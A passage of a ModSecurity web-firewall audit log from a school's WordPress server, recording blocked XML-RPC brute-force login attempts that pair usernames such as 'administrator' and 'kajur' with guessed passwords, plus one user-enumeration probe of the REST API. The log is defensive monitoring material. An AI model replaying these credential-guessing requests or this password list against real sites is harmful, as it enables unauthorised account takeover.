proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118932230692 4460 (- - -) Stopwatch2: 1749118932230692 4460; combined=3355, p1=341, p2=2820, p3=0, p4=0, p5=110, sr=81, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d6a6749-Z-- --8050644e-A-- [05/Jun/2025:17:23:19 +0700] aEFwF-th7G2xELALzPZYTgAAAMI 103.236.140.4 48580 103.236.140.4 8181 --8050644e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8050644e-C-- wp.getUsersBlogs administrator hellokitty --8050644e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8050644e-E-- --8050644e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (65+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118999776450 4959 (- - -) Stopwatch2: 1749118999776450 4959; combined=3638, p1=401, p2=3064, p3=0, p4=0, p5=102, sr=81, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8050644e-Z-- --684ecd32-A-- [05/Jun/2025:17:24:22 +0700] aEFwVuth7G2xELALzPZYdAAAAMY 103.236.140.4 48710 103.236.140.4 8181 --684ecd32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --684ecd32-C-- wp.getUsersBlogs administrator 12345a --684ecd32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --684ecd32-E-- --684ecd32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119062105580 4684 (- - -) Stopwatch2: 1749119062105580 4684; combined=3476, p1=396, p2=2911, p3=0, p4=0, p5=100, sr=83, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --684ecd32-Z-- --c908c527-A-- [05/Jun/2025:17:25:22 +0700] aEFwklwdJdhOudw5hdz6kgAAAIw 103.236.140.4 48900 103.236.140.4 8181 --c908c527-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c908c527-C-- wp.getUsersBlogs administrator magic --c908c527-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c908c527-E-- --c908c527-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119122218840 4697 (- - -) Stopwatch2: 1749119122218840 4697; combined=3509, p1=344, p2=2971, p3=0, p4=0, p5=111, sr=78, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c908c527-Z-- --5ca4814e-A-- [05/Jun/2025:17:25:26 +0700] aEFwllwdJdhOudw5hdz6lgAAAIs 103.236.140.4 48912 103.236.140.4 8181 --5ca4814e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.147.185.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.147.185.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ca4814e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ca4814e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749119126396948 1943 (- - -) Stopwatch2: 1749119126396948 1943; combined=1006, p1=350, p2=629, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ca4814e-Z-- --fe351534-A-- [05/Jun/2025:17:26:24 +0700] aEFw0Oth7G2xELALzPZY2QAAAMw 103.236.140.4 49060 103.236.140.4 8181 --fe351534-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fe351534-C-- wp.getUsersBlogs administrator astonvilla --fe351534-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe351534-E-- --fe351534-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119184045124 5178 (- - -) Stopwatch2: 1749119184045124 5178; combined=3706, p1=472, p2=3065, p3=0, p4=0, p5=100, sr=91, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe351534-Z-- --80e5c053-A-- [05/Jun/2025:17:27:26 +0700] aEFxDuth7G2xELALzPZZGAAAANI 103.236.140.4 49198 103.236.140.4 8181 --80e5c053-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --80e5c053-C-- wp.getUsersBlogs kajur Admin123 --80e5c053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80e5c053-E-- --80e5c053-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119246191906 5410 (- - -) Stopwatch2: 1749119246191906 5410; combined=3685, p1=495, p2=3033, p3=0, p4=0, p5=94, sr=107, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80e5c053-Z-- --741cbd3c-A-- [05/Jun/2025:17:28:29 +0700] aEFxTeth7G2xELALzPZZcgAAANA 103.236.140.4 49380 103.236.140.4 8181 --741cbd3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --741cbd3c-C-- wp.getUsersBlogs kajur kajur2002 --741cbd3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --741cbd3c-E-- --741cbd3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119309297871 5294 (- - -) Stopwatch2: 1749119309297871 5294; combined=3746, p1=436, p2=3107, p3=0, p4=0, p5=116, sr=84, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --741cbd3c-Z-- --36d8f736-A-- [05/Jun/2025:17:29:30 +0700] aEFxiuth7G2xELALzPZZogAAANI 103.236.140.4 49492 103.236.140.4 8181 --36d8f736-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --36d8f736-C-- wp.getUsersBlogs kajur Marketing2017 --36d8f736-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36d8f736-E-- --36d8f736-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119370935747 5228 (- - -) Stopwatch2: 1749119370935747 5228; combined=3713, p1=474, p2=3070, p3=0, p4=0, p5=100, sr=96, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36d8f736-Z-- --9a84b722-A-- [05/Jun/2025:17:30:30 +0700] aEFxxirHpfaS2Cuwh8UF6AAAAE8 103.236.140.4 49632 103.236.140.4 8181 --9a84b722-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --9a84b722-C-- wp.getUsersBlogs kajur marketing2023 --9a84b722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a84b722-E-- --9a84b722-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119430943635 4305 (- - -) Stopwatch2: 1749119430943635 4305; combined=3317, p1=348, p2=2803, p3=0, p4=0, p5=96, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a84b722-Z-- --ba9d9629-A-- [05/Jun/2025:17:31:35 +0700] aEFyB-th7G2xELALzPZZ3gAAAM0 103.236.140.4 49766 103.236.140.4 8181 --ba9d9629-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ba9d9629-C-- wp.getUsersBlogs kajur admin123456 --ba9d9629-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba9d9629-E-- --ba9d9629-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (52+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119495413850 4480 (- - -) Stopwatch2: 1749119495413850 4480; combined=3402, p1=353, p2=2874, p3=0, p4=0, p5=102, sr=79, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba9d9629-Z-- --366fdb7a-A-- [05/Jun/2025:17:32:35 +0700] aEFyQ1wdJdhOudw5hdz6-wAAAJc 103.236.140.4 49960 103.236.140.4 8181 --366fdb7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --366fdb7a-C-- wp.getUsersBlogs kajur admin@888 --366fdb7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --366fdb7a-E-- --366fdb7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119555099939 4187 (- - -) Stopwatch2: 1749119555099939 4187; combined=3250, p1=362, p2=2725, p3=0, p4=0, p5=95, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --366fdb7a-Z-- --1d672338-A-- [05/Jun/2025:17:33:35 +0700] aEFyfyrHpfaS2Cuwh8UGLAAAAE4 103.236.140.4 50084 103.236.140.4 8181 --1d672338-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --1d672338-C-- wp.getUsersBlogs kajur superuser --1d672338-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d672338-E-- --1d672338-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (56+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119615115650 4631 (- - -) Stopwatch2: 1749119615115650 4631; combined=3433, p1=367, p2=2872, p3=0, p4=0, p5=111, sr=83, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d672338-Z-- --81c96b4d-A-- [05/Jun/2025:17:34:35 +0700] aEFyu1wdJdhOudw5hdz7LgAAAI8 103.236.140.4 50224 103.236.140.4 8181 --81c96b4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --81c96b4d-C-- wp.getUsersBlogs kajur admin123456789 --81c96b4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81c96b4d-E-- --81c96b4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119675140246 5368 (- - -) Stopwatch2: 1749119675140246 5368; combined=3795, p1=418, p2=3166, p3=0, p4=0, p5=120, sr=87, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81c96b4d-Z-- --ec78b47f-A-- [05/Jun/2025:17:35:38 +0700] aEFy-uth7G2xELALzPZaEQAAANI 103.236.140.4 50374 103.236.140.4 8181 --ec78b47f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ec78b47f-C-- wp.getUsersBlogs kajur love --ec78b47f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec78b47f-E-- --ec78b47f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119738447212 5017 (- - -) Stopwatch2: 1749119738447212 5017; combined=3490, p1=415, p2=2904, p3=0, p4=0, p5=101, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec78b47f-Z-- --4d7bb850-A-- [05/Jun/2025:17:36:07 +0700] aEFzF-th7G2xELALzPZaIgAAAMk 103.236.140.4 50468 103.236.140.4 8181 --4d7bb850-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4d7bb850-C-- wp.getUsersBlogs kajur 1234%^&* --4d7bb850-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d7bb850-E-- --4d7bb850-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119767294707 4218 (- - -) Stopwatch2: 1749119767294707 4218; combined=3192, p1=352, p2=2676, p3=0, p4=0, p5=97, sr=78, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d7bb850-Z-- --f7f53a69-A-- [05/Jun/2025:17:36:48 +0700] aEFzQFwdJdhOudw5hdz7RwAAAJA 103.236.140.4 50524 103.236.140.4 8181 --f7f53a69-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f7f53a69-C-- wp.getUsersBlogs kajur yellow --f7f53a69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7f53a69-E-- --f7f53a69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO 